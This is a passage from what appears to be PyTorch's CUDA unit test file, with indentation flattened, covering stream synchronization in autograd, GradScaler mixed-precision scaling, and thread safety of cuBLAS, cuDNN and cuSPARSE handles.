# This function tests if bwd ops running on a side stream properly sync with the GraphRoot.
# The potential bug it targets is a race condition. The test uses multiple trials and
# torch.cuda._sleep such that if the race condition exists, the test will almost certainly fail,
# but there's a chance it may spuriously pass. Passing does not guarantee the backend is bug-free,
# but failure does guarantee there is a bug.
fwd_bwd_op_stream = torch.cuda.Stream()
bwd_ambient_stream = torch.cuda.Stream()
# We need these streams to be different otherwise the test is meaningless.
self.assertTrue(fwd_bwd_op_stream != bwd_ambient_stream)
size = int(1e3)
a = torch.full((size,), 2.0, device="cuda", requires_grad=True)
b = torch.full((size,), 3.0, device="cuda", requires_grad=True)
# I don't think we need any manual record_streams below.
# a and b remain in scope for the entire test.
# c and grad remain in scope for each iteration, and there's a full sync between iterations.
for trial in range(5):
torch.cuda.synchronize()
a.grad = b.grad = None
with torch.cuda.stream(fwd_bwd_op_stream):
c = a * b
with torch.cuda.stream(bwd_ambient_stream):
torch.cuda.synchronize()
# Long-running dummy kernel on bwd_ambient_stream delays filling of grad
torch.cuda._sleep(int(50 * get_cycles_per_ms()))
# Fills grad on bwd_ambient_stream
grad = torch.full((size,), float(trial + 1), device="cuda")
# Bwd ops still run on fwd_bwd_ops_stream, so the following will likely fail if
# bwd ops don't sync with bwd_ambient_stream before consuming grad.
torch.autograd.backward(tensors=c, grad_tensors=grad)
# See https://github.com/pytorch/pytorch/issues/47028
# assertEquals below run on bwd_ambient_stream, so this test may also fail
# if backward() fails to sync with bwd_ambient_stream at the end.
# Synchronizing here works around the issue until a proper fix can be made.
torch.cuda.synchronize()
with torch.no_grad():
self.assertEqual(a.grad, grad * b)
self.assertEqual(b.grad, grad * a)
def test_streaming_backwards_callback(self):
# Tests if autograd callbacks sync properly with respect to leaf streams and
# the user-facing stream surrounding backward(). If it fails, first suspect is
# sync logic where "final_callbacks_" are called in torch/csrc/autograd/engine.cpp
MultiplyInStream = self._make_multiply_in_stream()
size = int(1e3)
a = torch.full((size,), 1, device="cuda", dtype=torch.float, requires_grad=True)
b = torch.full((size,), 1, device="cuda", dtype=torch.float, requires_grad=True)
s0 = torch.cuda.Stream()
s1 = torch.cuda.Stream()
s2 = torch.cuda.Stream()
stash = []
# sets up a nontrivial structure of leaf streams
s0.wait_stream(torch.cuda.current_stream())
with torch.cuda.stream(s0):
c = MultiplyInStream.apply(a, 2)
s1.wait_stream(torch.cuda.current_stream())
with torch.cuda.stream(s1):
d = MultiplyInStream.apply(b, 3)
s1.wait_stream(s0)
e = c * d
def clone_leaf_grads():
stash.append(a.grad.clone())
stash.append(b.grad.clone())
# Use a hook on e to install the callback
e.register_hook(lambda grad: torch.autograd.Variable._execution_engine.queue_callback(clone_leaf_grads))
s2.wait_stream(s1)
with torch.cuda.stream(s2):
e.sum().backward()
# The autograd engine should sync s2 with all leaf streams then run the callback clone_leaf_grads on s2.
# If those things happened properly, checking the values of the cloned grads on s2 should be safe:
self.assertEqual(stash[0], torch.full_like(a, 6))
self.assertEqual(stash[1], torch.full_like(a, 6))
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
@unittest.skipIf(IS_SANDCASTLE or IS_REMOTE_GPU, "Does not work on Sandcastle")
def test_cuda_init_race(self):
# See https://github.com/pytorch/pytorch/issues/16559
import subprocess
subprocess.check_call([sys.executable, '-c', """\
import torch
import threading
def worker(rank):
torch.tensor([1.]).cuda(rank)
t1 = threading.Thread(target=worker, args=(0,))
t2 = threading.Thread(target=worker, args=(1,))
t1.start()
t2.start()
"""])
def test_fixed_cuda_assert_async(self):
with self.assertRaisesRegex(RuntimeError, "Boolean value of Tensor with no values is ambiguous"):
torch._assert_async(torch.tensor([], device="cuda"))
with self.assertRaisesRegex(RuntimeError, "Boolean value of Tensor with more than one value is ambiguous"):
torch._assert_async(torch.tensor([0, 0], device="cuda"))
torch._assert_async(torch.tensor(1, device="cuda"))
torch._assert_async(torch.tensor(0.1, device="cuda"))
torch._assert_async(torch.tensor(-0.1, device="cuda"))
torch._assert_async(torch.tensor(True, device="cuda"))
torch._assert_async(torch.tensor(0 + 0.1j, device="cuda"))
fail_stmts = [
"torch._assert_async(torch.tensor(0, device='cuda'))",
"torch._assert_async(torch.tensor(0.0, device='cuda'))",
"torch._assert_async(torch.tensor(False, device='cuda'))",
"torch._assert_async(torch.tensor(0 + 0j, device='cuda'))",
]
import subprocess
for stmt in fail_stmts:
with self.subTest(stmt=stmt):
r = subprocess.call([sys.executable, '-c', f"""\
import torch
{stmt}
torch.cuda.synchronize()
"""])
self.assertTrue(r != 0)
def test_grad_scaling_unscale(self, dtype=torch.float):
inv_scale = torch.full((1,), 0.25, dtype=torch.float, device="cuda:0")
found_inf = torch.full((1,), 0.0, dtype=torch.float, device="cuda:0")
size = 10
g = torch.full((size, size), 4.0, dtype=dtype, device="cuda:0")
ginf = g.clone()
ginf[2, 2] = float('inf')
gnan = g.clone()
gnan[2, 2] = float('nan')
# Tries selected combinations of
# - contiguous grads
# - g.clone().t() which is not contiguous but still non overlapping and dense
# - variants of g.clone()[:, :5] which are not non overlapping and dense
# Non overlapping and dense grads route into a multi tensor apply kernel,
# others use a fallback per-tensor kernel, so we should try both.
cases = (
([g.clone(), g.clone()], False),
([g.clone(), g.clone().t()], False),
([g.clone(), g.clone()[:, :5]], False),
([g.clone()[:, :5], g.clone()[:, :5]], False),
([g.clone(), ginf.clone()], True),
([g.clone(), gnan.clone()], True),
([g.clone(), ginf.clone()[:, :5]], True),
([g.clone(), gnan.clone()[:, :5]], True),
([ginf.clone(), g.clone()[:, :5]], True),
([ginf.clone()[:, :5], g.clone()[:, :5]], True),
)
for grads, has_inf in cases:
found_inf.zero_()
torch._amp_foreach_non_finite_check_and_unscale_(grads, found_inf, inv_scale)
if has_inf:
self.assertEqual(found_inf, 1.0)
else:
self.assertEqual(found_inf, 0.0)
for grad in grads:
self.assertEqual(grad, torch.ones_like(grad), rtol=1e-5, atol=1e-7)
# When passing lists with mismatched dtypes to a raw
# _amp_foreach_non_finite_check_and_unscale_ call,
# it's expected to fall back to single-tensor TensorIterator kernel.
grads = [g.clone(), g.to(dtype=torch.float16)]
torch._amp_foreach_non_finite_check_and_unscale_(grads, found_inf, inv_scale)
for grad in grads:
self.assertEqual(grad, torch.ones_like(grad), rtol=1e-5, atol=1e-7)
# Passing lists with mismatched devices to a raw
# _amp_foreach_non_finite_check_and_unscale_ call should raise errors.
if TEST_MULTIGPU:
with self.assertRaisesRegex(RuntimeError, r"Expected all tensors to be on the same device"):
torch._amp_foreach_non_finite_check_and_unscale_([g.clone(), g.to(device="cuda:1")],
found_inf,
inv_scale)
# Creates a list of grads with mismatched dtypes and devices, to ensure
# scaler._unscale_grads_ organizes grads by dtype and device before calling
# _amp_foreach_non_finite_check_and_unscale_ on each set.
# If inject_inf >= 0, writes an inf into one grad for _unscale_grads_ to find.
def perfect_storm_grads(inject_inf):
grads = [g.clone(), g.clone()[:, :5], g.to(dtype=torch.float16), g.to(dtype=torch.float16)]
if TEST_MULTIGPU:
grads += [g.to(device="cuda:1"),
g.to(device="cuda:1")[:, :5],
g.to(device="cuda:1", dtype=torch.float16),
g.to(device="cuda:1", dtype=torch.float16)]
if inject_inf >= 0:
grads[inject_inf][2, 2] = float('inf')
return grads
scaler = torch.cuda.amp.GradScaler()
dummy_params = [torch.empty_like(g) for g in perfect_storm_grads(-1)]
dummy_opt = torch.optim.SGD(dummy_params, lr=1.)
# Ensures the inf/nan checking can find an inf injected onto any grad in the perfect storm.
for inject_inf in range(-1, len(dummy_params)):
found_inf = torch.full((1,), 0.0, dtype=torch.float, device="cuda:0")
grads = perfect_storm_grads(inject_inf)
for i, p in enumerate(dummy_params):
p.grad = grads[i]
found_inf_per_device = scaler._unscale_grads_(dummy_opt, inv_scale, found_inf, True)
if inject_inf < 0:
# No inf was injected, ensures unscaling worked normally.
self.assertTrue(sum(v.item() for v in found_inf_per_device.values()) == 0)
for grad in grads:
self.assertEqual(grad, torch.ones_like(grad), rtol=1e-5, atol=1e-7)
else:
# inf was injected, ensures inf was found.
self.assertTrue(sum(v.item() for v in found_inf_per_device.values()) == 1)
def test_grad_scaling_update_scale(self, device="cuda", dtype=torch.float):
growth = 2.0
backoff = 0.25
growth_interval = 2
scale = torch.full((1,), 4.0, dtype=dtype, device=device)
growth_tracker = torch.full((1,), 0.0, dtype=torch.int32, device=device)
found_inf = torch.full((1,), 0.0, dtype=torch.float, device="cuda:0")
# Simulates 2 consecutive unskipped iterations
torch._amp_update_scale_(scale, growth_tracker, found_inf, growth, backoff, growth_interval)
self.assertEqual(growth_tracker, 1)
self.assertEqual(scale, 4.0)
torch._amp_update_scale_(scale, growth_tracker, found_inf, growth, backoff, growth_interval)
self.assertEqual(growth_tracker, 0)
self.assertEqual(scale, 8.0)
# Simulates a skipped iteration
found_inf.fill_(1.0)
torch._amp_update_scale_(scale, growth_tracker, found_inf, growth, backoff, growth_interval)
self.assertEqual(growth_tracker, 0)
self.assertEqual(scale, 2.0)
def test_grad_scaling_unscale_sparse(self, device="cuda", dtype=torch.float):
scaler = torch.cuda.amp.GradScaler()
inv_scale = torch.full((1,), 0.25, dtype=dtype, device=device)
found_inf = torch.empty((1,), dtype=dtype, device=device)
cur = found_inf.device
# As of d0c925f (4/16/20), docs are unclear about best API for sparse cuda tensor construction.
# https://pytorch.org/docs/master/tensors.html shows torch.sparse_coo_tensor(...), but it has no docstring.
# The same page shows several tensors with layout=torch.sparse_coo, but no constructors using that layout.
# Meanwhile, https://pytorch.org/docs/master/sparse.html shows torch.sparse.FloatTensor(...), which looks
# legacy and does not accept a device="cuda" kwarg. Going with torch.sparse_coo_tensor.
i = torch.tensor([[0, 1, 1],
[2, 0, 2]], device="cuda", dtype=torch.int64)
v = torch.tensor([16., 32., 64.], device="cuda", dtype=torch.float)
s = torch.sparse_coo_tensor(i, v, torch.Size([2, 3]), device="cuda", dtype=dtype)
p = s.clone()
assert p.is_sparse
opt = torch.optim.SGD([p], lr=1.)
p.grad = s.clone()
found_inf.zero_()
found_inf = scaler._unscale_grads_(opt, inv_scale, found_inf, False)[cur]
self.assertEqual(found_inf, 0.0)
self.assertEqual(p.grad.to_dense(), (s / 4).to_dense())
v = torch.FloatTensor([16., 32., float('inf')])
p.grad = torch.sparse_coo_tensor(i, v, torch.Size([2, 3]), device="cuda", dtype=dtype)
found_inf.zero_()
found_inf = scaler._unscale_grads_(opt, inv_scale, found_inf, False)[cur]
self.assertEqual(found_inf, 1.0)
v = torch.FloatTensor([16., 32., float('nan')])
p.grad = torch.sparse_coo_tensor(i, v, torch.Size([2, 3]), device="cuda", dtype=dtype)
found_inf.zero_()
found_inf = scaler._unscale_grads_(opt, inv_scale, found_inf, False)[cur]
self.assertEqual(found_inf, 1.0)
p = s.clone().half()
assert p.is_sparse
opt = torch.optim.SGD([p], lr=1.)
p.grad = s.clone().half()
found_inf.zero_()
found_inf = scaler._unscale_grads_(opt, inv_scale, found_inf, True)[cur]
self.assertEqual(found_inf, 0.0)
self.assertEqual(p.grad.to_dense(), (s.half() / 4).to_dense())
# Creates fp16 sparse tensor with duplicated indices (uncoalesced). The uncoalesced representation
# does not overflow in fp16, but the coalesced representation would, because 64000 + 64000 > fp16 max.
# _amp_non_finite_check_and_unscale_ should report an overflow here.
i = torch.LongTensor([[0, 1, 0],
[2, 0, 2]])
v = torch.FloatTensor([64000., 32., 64000.])
p.grad = torch.sparse_coo_tensor(i, v, torch.Size([2, 3]), device="cuda", dtype=torch.float16)
found_inf.zero_()
found_inf = scaler._unscale_grads_(opt, inv_scale, found_inf, True)[cur]
self.assertEqual(found_inf, 1.0)
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_grad_scaling_device_as_key(self):
# Ensure that different instances of "device" objects that point to the same device
# are treated as identical keys by dicts. GradScaler relies on this behavior, and may
# error otherwise in a way that's difficult to detect (a silent performance hit).
d = {}
t = torch.empty((1,), device="cuda:0")
dev0a = torch.device("cuda:0")
dev0b = torch.device("cuda:0")
dev1a = torch.device("cuda:1")
dev1b = torch.device("cuda:1")
self.assertTrue(hash(dev0a) == hash(dev0b))
self.assertTrue(hash(dev1a) == hash(dev1b))
d[dev0a] = "0a"
d[dev0b] = "0b"
self.assertTrue(len(d) == 1)
self.assertTrue(d[dev0a] == "0b")
d[t.device] = "t"
self.assertTrue(len(d) == 1)
self.assertTrue(d[dev0a] == "t")
d[dev1a] = "1a"
d[dev1b] = "1b"
self.assertTrue(len(d) == 2)
self.assertTrue(d[dev1a] == "1b")
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_grad_scaling_scale(self):
scaler = torch.cuda.amp.GradScaler(init_scale=2.)
t0 = torch.full((1,), 4.0, dtype=torch.float32, device="cuda:0")
t1 = torch.full((1,), 4.0, dtype=torch.float32, device="cuda:1")
# Create some nested iterables of tensors on different devices.
outputs = (t1.clone(), (t0.clone(), t1.clone()), [t0.clone(), (t1.clone(), t0.clone())])
outputs = scaler.scale(outputs)
self.assertTrue(outputs[0] == 8.0 and outputs[1][0] == 8.0 and outputs[1][1] == 8.0 and
outputs[2][0] == 8.0 and outputs[2][1][0] == 8.0 and outputs[2][1][1] == 8.0)
self.assertTrue(scaler._scale.device == t1.device)
def test_grad_scaling_state_dict(self):
for lazy_init_scale in True, False:
s0 = torch.cuda.amp.GradScaler(init_scale=3., growth_factor=4., backoff_factor=.5, growth_interval=2)
s1 = torch.cuda.amp.GradScaler(init_scale=6., growth_factor=7., backoff_factor=.8, growth_interval=1)
# sets a random value for load_state_dict to overwrite
s1._init_growth_tracker = 7
if lazy_init_scale:
# Dummy scale() call to ensure the scale tensor is lazily initialized.
s1.scale(torch.full((1,), 4.0, dtype=torch.float32, device="cuda:0"))
self.assertTrue(isinstance(s1._scale, torch.cuda.FloatTensor))
s1.load_state_dict(s0.state_dict())
self.assertEqual(s1.get_scale(), 3.)
self.assertEqual(s1.get_growth_factor(), 4.)
self.assertEqual(s1.get_backoff_factor(), .5)
self.assertEqual(s1.get_growth_interval(), 2)
self.assertEqual(s1._init_growth_tracker, 0)
def _create_scaling_models_optimizers(self, device="cuda"):
# Create a module+optimizer that will use scaling, and a control module+optimizer
# that will not use scaling, against which the scaling-enabled module+optimizer can be compared.
mod_control = torch.nn.Sequential(torch.nn.Linear(8, 8), torch.nn.Linear(8, 8)).to(device=device)
mod_scaling = torch.nn.Sequential(torch.nn.Linear(8, 8), torch.nn.Linear(8, 8)).to(device=device)
for c, s in zip(mod_control.parameters(), mod_scaling.parameters()):
s.data.copy_(c.data)
opt_control = torch.optim.SGD(mod_control.parameters(), lr=1.0)
opt_scaling = torch.optim.SGD(mod_scaling.parameters(), lr=1.0)
return mod_control, mod_scaling, opt_control, opt_scaling
def _create_scaling_case(self, device="cuda", dtype=torch.float):
data = [(torch.randn((8, 8), dtype=dtype, device=device), torch.randn((8, 8), dtype=dtype, device=device)),
(torch.randn((8, 8), dtype=dtype, device=device), torch.randn((8, 8), dtype=dtype, device=device)),
(torch.randn((8, 8), dtype=dtype, device=device), torch.randn((8, 8), dtype=dtype, device=device)),
(torch.randn((8, 8), dtype=dtype, device=device), torch.randn((8, 8), dtype=dtype, device=device))]
loss_fn = torch.nn.MSELoss().cuda()
skip_iter = 2
return self._create_scaling_models_optimizers(device=device) + (data, loss_fn, skip_iter)
# _run_scaling_case generalizes some single-optimizer test logic to avoid too much copy-pasting below.
def _run_scaling_case(self, run, unskipped, skipped, atol=1e-7):
# Ensure scaling can be disabled without changing user control flow.
for enabled in True, False:
mod_control, mod_scaling, opt_control, opt_scaling, data, loss_fn, skip_iter = self._create_scaling_case()
# For functionality, test with a modest initial scale, and an unrealistically-large growth factor
# so any potential errors with the growth factor handling will be magnified.
scaler = torch.cuda.amp.GradScaler(init_scale=128., growth_factor=2.0, enabled=enabled, growth_interval=1)
_ = run(data, mod_control, opt_control, scaler, loss_fn, skip_iter, False)
ret = run(data, mod_scaling, opt_scaling, scaler, loss_fn, skip_iter, True)
# Allows run() to optionally return a different scaler instance.
scaler = ret if ret else scaler
# If scaling was enabled, the scale factor should have been multiplied by the growth factor
# len(data) - skipped times and the backoff factor "skipped" times.
if enabled:
net_growth = scaler.get_growth_factor()**unskipped if unskipped > 0 else 1.0
net_backoff = scaler.get_backoff_factor()**skipped if skipped > 0 else 1.0
self.assertTrue(scaler.get_scale() == (128. * net_growth * net_backoff))
else:
self.assertTrue(scaler.get_scale() == 1.0)
for c, s in zip(mod_control.parameters(), mod_scaling.parameters()):
self.assertEqual(c, s, atol=atol, rtol=1e-05)
# Compares no scaling + no autocasting against scaling + autocasting.
def test_grad_scaling_autocast(self):
try_pickle = False
def run(data, model, optimizer, scaler, loss_fn, skip_iter, try_scaling_api):
for i, (input, target) in enumerate(data):
optimizer.zero_grad()
with torch.autocast('cuda', enabled=try_scaling_api):
output = model(input)
loss = loss_fn(output, target)
if try_scaling_api:
scaler.scale(loss).backward()
if i == skip_iter and scaler.is_enabled():
model[1].weight.grad.data.fill_(float('inf'))
scaler.step(optimizer)
scaler.update()
if try_pickle:
scaler = pickle.loads(pickle.dumps(scaler))
else:
loss.backward()
if (not scaler.is_enabled()) or (i != skip_iter):
optimizer.step()
return scaler
# sets atol=1e-3 because we're comparing pure fp32 arithmetic vs a mixture of fp16 and fp32
self._run_scaling_case(run, unskipped=3, skipped=1, atol=1e-3)
# this will be picked up by try_pickle within run():
try_pickle = True
self._run_scaling_case(run, unskipped=3, skipped=1, atol=1e-3)
def test_grad_scaling_clipping(self):
def run(data, model, optimizer, scaler, loss_fn, skip_iter, try_scaling_api):
max_norm = 0.2 # A reasonable value that actually has an effect, based on printouts of grads
for i, (input, target) in enumerate(data):
optimizer.zero_grad()
output = model(input)
loss = loss_fn(output, target)
if try_scaling_api:
scaler.scale(loss).backward()
torch.nn.utils.clip_grad_norm_(model.parameters(), max_norm * scaler.get_scale())
if i == skip_iter and scaler.is_enabled():
model[1].weight.grad.data.fill_(float('inf'))
scaler.step(optimizer)
scaler.update()
else:
loss.backward()
torch.nn.utils.clip_grad_norm_(model.parameters(), max_norm)
if (not scaler.is_enabled()) or (i != skip_iter):
optimizer.step()
self._run_scaling_case(run, unskipped=3, skipped=1, atol=1e-5)
def test_grad_scaling_clipping_separate_unscale(self):
def run(data, model, optimizer, scaler, loss_fn, skip_iter, try_scaling_api):
max_norm = 0.2 # A reasonable value that actually has an effect, based on printouts of grads
for i, (input, target) in enumerate(data):
optimizer.zero_grad()
output = model(input)
loss = loss_fn(output, target)
if try_scaling_api:
scaler.scale(loss).backward()
if i == skip_iter and scaler.is_enabled():
model[1].weight.grad.data.fill_(float('inf'))
scaler.unscale_(optimizer)
torch.nn.utils.clip_grad_norm_(model.parameters(), max_norm, error_if_nonfinite=False)
scaler.step(optimizer)
scaler.update()
else:
loss.backward()
torch.nn.utils.clip_grad_norm_(model.parameters(), max_norm)
if (not scaler.is_enabled()) or (i != skip_iter):
optimizer.step()
self._run_scaling_case(run, unskipped=3, skipped=1)
@unittest.skipIf(IS_WINDOWS, 'FIXME: fix this test for Windows')
def test_grad_scaling_penalty(self):
def run(data, model, optimizer, scaler, loss_fn, skip_iter, try_scaling_api):
for i, (input, target) in enumerate(data):
optimizer.zero_grad()
output = model(input)
loss = loss_fn(output, target)
if try_scaling_api:
grad_params = torch.autograd.grad(scaler.scale(loss),
model.parameters(), create_graph=True)
inv_scale = 1. / scaler.get_scale()
grad_params = [p * inv_scale for p in grad_params]
else:
grad_params = torch.autograd.grad(loss, model.parameters(), create_graph=True)
grad_norm = 0
for grad in grad_params:
grad_norm += grad.pow(2).sum()
grad_norm = grad_norm.sqrt()
loss = loss + grad_norm
if try_scaling_api:
scaler.scale(loss).backward()
if i == skip_iter and scaler.is_enabled():
model[1].weight.grad.data.fill_(float('inf'))
scaler.step(optimizer)
scaler.update()
else:
loss.backward()
if (not scaler.is_enabled()) or (i != skip_iter):
optimizer.step()
self._run_scaling_case(run, unskipped=3, skipped=1)
def test_grad_scaling_accumulation(self):
def run(data, model, optimizer, scaler, loss_fn, skip_iter, try_scaling_api):
iters_to_accumulate = 2
for i, (input, target) in enumerate(data):
output = model(input)
loss = loss_fn(output, target)
loss = loss / iters_to_accumulate
if try_scaling_api:
scaler.scale(loss).backward()
else:
loss.backward()
if (i + 1) % iters_to_accumulate == 0:
if try_scaling_api:
scaler.step(optimizer)
scaler.update()
optimizer.zero_grad()
else:
optimizer.step()
optimizer.zero_grad()
self._run_scaling_case(run, unskipped=2, skipped=0)
def test_grad_scaling_multiple(self):
# Tests gradient scaling with 2 models and 2 optimizers that both receive gradients from 2 losses.
# Some of the logic here cannot reuse the generic helper functions created for the 1-optimizer cases.
for enabled in True, False:
mod_control0, mod_scaling0, opt_control0, opt_scaling0, data, loss_fn, skip_iter = \
self._create_scaling_case()
mod_control1, mod_scaling1, opt_control1, opt_scaling1 = \
self._create_scaling_models_optimizers()
scaler = torch.cuda.amp.GradScaler(init_scale=128., growth_factor=2.0, enabled=enabled, growth_interval=1)
def run(model0, model1, optimizer0, optimizer1, try_scaling_api):
for i, (input, target) in enumerate(data):
optimizer0.zero_grad()
optimizer1.zero_grad()
output0 = model0(input)
output1 = model1(input)
loss0 = loss_fn(0.3 * output0 + 0.7 * output1, target)
loss1 = loss_fn(0.6 * output0 - 0.4 * output1, target)
if try_scaling_api:
scaler.scale(loss0).backward(retain_graph=True)
scaler.scale(loss1).backward()
if i == skip_iter and scaler.is_enabled():
model1[1].weight.grad.data.fill_(float('inf'))
# As an additional stress test, separately unscale for one of the optimizers.
scaler.unscale_(optimizer0)
scaler.step(optimizer0)
scaler.step(optimizer1)
scaler.update()
else:
loss0.backward(retain_graph=True)
loss1.backward()
optimizer0.step()
if (not scaler.is_enabled()) or (i != skip_iter):
optimizer1.step()
run(mod_control0, mod_control1, opt_control0, opt_control1, False)
run(mod_scaling0, mod_scaling1, opt_scaling0, opt_scaling1, True)
# The loss scale should have been multiplied by the growth factor 3 times and the backoff factor once.
self.assertTrue(scaler.get_scale() == (128. * scaler.get_growth_factor()**3 *
scaler.get_backoff_factor()**1) if enabled else 1.0)
for c, s in zip(chain(mod_control0.parameters(), mod_control1.parameters()),
chain(mod_scaling0.parameters(), mod_scaling1.parameters())):
self.assertEqual(c, s, rtol=1e-5, atol=1e-7)
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_grad_scaling_multigpu(self):
# Same as above, but runs some of the models on device 1.
# GradScaler should transparently handle losses and gradients on multiple devices.
# This test could be combined with the test above, but I think it makes sense to treat
# multi-GPU operations separately.
dev0 = torch.device("cuda:0")
dev1 = torch.device("cuda:1")
for enabled in True, False:
mod_control0, mod_scaling0, opt_control0, opt_scaling0, data, loss_fn, skip_iter = \
self._create_scaling_case()
mod_control1, mod_scaling1, opt_control1, opt_scaling1 = \
self._create_scaling_models_optimizers(device=dev1)
scaler = torch.cuda.amp.GradScaler(init_scale=128., growth_factor=2.0, enabled=enabled, growth_interval=1)
def run(model0, model1, optimizer0, optimizer1, try_scaling_api):
for i, (input, target) in enumerate(data):
optimizer0.zero_grad()
optimizer1.zero_grad()
output0 = model0(input)
output1 = model1(input.to(dev1))
loss0 = loss_fn(0.3 * output0 + 0.7 * output1.to(dev0), target)
loss1 = loss_fn(0.6 * output0.to(dev1) - 0.4 * output1, target.to(dev1))
if try_scaling_api:
scaler.scale(loss0).backward(retain_graph=True)
scaler.scale(loss1).backward()
if i == skip_iter and scaler.is_enabled():
model1[1].weight.grad.data.fill_(float('inf'))
# As an additional stress test, separately unscale for one of the optimizers.
scaler.unscale_(optimizer0)
scaler.step(optimizer0)
scaler.step(optimizer1)
# Make sure the found_infs were collected properly across optimizers and devices.
if scaler.is_enabled():
self.assertTrue(len(scaler._found_inf_per_device(optimizer0)) == 1)
self.assertTrue(len(scaler._found_inf_per_device(optimizer1)) == 1)
self.assertTrue(scaler._found_inf_per_device(optimizer0)[dev0].item() == 0.)
self.assertTrue(scaler._found_inf_per_device(optimizer1)[dev1].item() ==
float(i == skip_iter))
scaler.update()
else:
loss0.backward(retain_graph=True)
loss1.backward()
optimizer0.step()
if (not scaler.is_enabled()) or (i != skip_iter):
optimizer1.step()
run(mod_control0, mod_control1, opt_control0, opt_control1, False)
run(mod_scaling0, mod_scaling1, opt_scaling0, opt_scaling1, True)
# The loss scale should have been multiplied by the growth factor 3 times and the backoff factor once.
self.assertTrue(scaler.get_scale() == (128. * scaler.get_growth_factor()**3 *
scaler.get_backoff_factor()**1) if enabled else 1.0)
# Copy mod_control1 and mod_scaling1 back the device 0 for comparison
mod_control1.to(dev0)
mod_scaling1.to(dev0)
for c, s in zip(chain(mod_control0.parameters(), mod_control1.parameters()),
chain(mod_scaling0.parameters(), mod_scaling1.parameters())):
self.assertEqual(c, s, rtol=1e-5, atol=1e-7)
def test_cublas_multiple_threads_same_device(self):
# Note, these parameters should be very carefully tuned
# Too small number makes it hard for the racing condition
# to happen, while too large number sometimes cause hang
size = 1024
num_threads = 2
trials = 3
test_iters = 100
weight = torch.ones((size, size), device='cuda')
results = {}
barrier = threading.Barrier(num_threads)
def _worker(t):
my_stream = torch.cuda.Stream()
# Hard sync so we don't need to worry about creating and using tensors
# across streams or the fact that default streams are thread-local.
# Those issues are not the target of this test.
torch.cuda.synchronize()
# Line up threads to increase likelihood of race conditions.
barrier.wait()
with torch.cuda.stream(my_stream):
for i in range(test_iters):
# If all threads are sharing the same cublas handle,
# the following sequence may occur:
# thread 0 calls cublasSetStream()
# thread 1 calls cublasSetStream()
# thread 0 launches its raw gemm, which it thinks is in
# its own stream, but is actually in thread 1's stream.
# thread 0 enqueues its div_, which IS is its own stream,
# but actually now races with its gemm.
results[t] = torch.mm(results[t], weight)
results[t].div_(float(size))
torch.cuda.synchronize()
for _ in range(trials):
for t in range(num_threads):
results[t] = torch.ones((size, size), device='cuda')
threads = [threading.Thread(target=_worker,
args=(t,)) for t in range(num_threads)]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
for t in range(num_threads):
self.assertEqual(results[t].sum().item(), size * size)
# Test is flaky on Windows (https://github.com/pytorch/pytorch/issues/57401)
@unittest.skipIf(IS_WINDOWS, 'Test is flaky on Windows (see issue 57401)')
@unittest.skipIf(not TEST_CUDNN, 'CUDNN not available')
@skipIfRocm
def test_cudnn_multiple_threads_same_device(self):
# This function is intended to test the lazy creation and reuse of per-thread
# cudnn handles on each device in aten/src/ATen/cudnn/Handles.cpp.
# Failure here likely indicates something wrong with that logic.
weight = torch.ones((1, 1, 2, 2), device='cuda')
results = {}
num_threads = 2
trials = 3
test_iters = 1000
barrier = threading.Barrier(num_threads)
with torch.backends.cudnn.flags(enabled=True):
def _worker(t):
my_stream = torch.cuda.Stream()
# Hard sync so we don't need to worry about creating and using tensors
# across streams or the fact that default streams are thread-local.
# Those issues are not the target of this test.
torch.cuda.synchronize()
# Line up threads to increase likelihood of race conditions.
barrier.wait()
with torch.cuda.stream(my_stream):
for _ in range(test_iters):
# If all threads are sharing the same cudnn handle,
# the following sequence may occur:
# thread 0 calls setCuDNNStreamToCurrent()
# thread 1 calls setCuDNNStreamToCurrent()
# thread 0 launches its raw convolution, which it thinks is in
# its own stream, but is actually in thread 1's stream.
# thread 0 enqueues its div_, which IS is its own stream,
# but now races with its convolution.
results[t] = torch.nn.functional.conv2d(results[t], weight, padding=0)
results[t].div_(4.0)
torch.cuda.synchronize()
for _ in range(trials):
for t in range(num_threads):
results[t] = torch.ones((1, 1, 2048, 2048), device='cuda')
threads = [threading.Thread(target=_worker,
args=(t,)) for t in range(num_threads)]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
for t in range(num_threads):
self.assertEqual(results[t].sum().item(),
(2048 - test_iters) * (2048 - test_iters))
def test_cusparse_multiple_threads_same_device(self):
size = 1024
num_threads = 2
trials = 3
test_iters = 500
def ones_sparse(size):
a = torch.arange(size, device='cuda')
indices = torch.cartesian_prod(a, a).t()
values = torch.ones(size * size, device='cuda')
return torch.sparse_coo_tensor(indices, values)
weight = ones_sparse(size)
results = {}
barrier = threading.Barrier(num_threads)
def _worker(t):
my_stream = torch.cuda.Stream()
# Hard sync so we don't need to worry about creating and using tensors
# across streams or the fact that default streams are thread-local.
# Those issues are not the target of this test.
torch.cuda.synchronize()
# Line up threads to increase likelihood of race conditions.
barrier.wait()
with torch.cuda.stream(my_stream):
for i in range(test_iters):
# If all threads are sharing the same cublas handle,
# the following sequence may occur:
# thread 0 calls cublasSetStream()
# thread 1 calls cublasSetStream()
# thread 0 launches its raw gemm, which it thinks is in
# its own stream, but is actually in thread 1's stream.
# thread 0 enqueues its div_, which IS is its own stream,
# but actually now races with its gemm.
results[t] = weight.mm(results[t])
results[t].div_(float(size))
torch.cuda.synchronize()
for _ in range(trials):
for t in range(num_threads):
results[t] = torch.ones((size, size), device='cuda')
threads = [threading.Thread(target=_worker,
args=(t,)) for t in range(num_threads)]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
for t in range(num_threads):
self.assertEqual(results[t].sum().item(), size * size)
def _run_autocast_outofplace(self, op, args, run_as_type, out_type=None, module=torch, add_kwargs=None):
# helper to cast args
def cast(val, to_type):
if isinstance(val, torch.Tensor):
return val.to(to_type) if val.is_floating_point() else val
elif isinstance(val, collections.abc.Iterable):
return type(val)(cast(v, to_type) for v in val)
else:
return val
if add_kwargs is None:
add_kwargs = {}
fast_dtype = torch.bfloat16 if run_as_type == torch.bfloat16 else torch.float16
self.assertFalse(torch.is_autocast_enabled())
with torch.autocast('cuda', dtype=fast_dtype):
self.assertTrue(torch.is_autocast_enabled())
out_type = out_type if out_type is not None else run_as_type
output = output_method = None
# Try module.* variant, if requested:
if module is not None and hasattr(module, op):
output = getattr(module, op)(*args, **add_kwargs)
if isinstance(output, torch.Tensor):
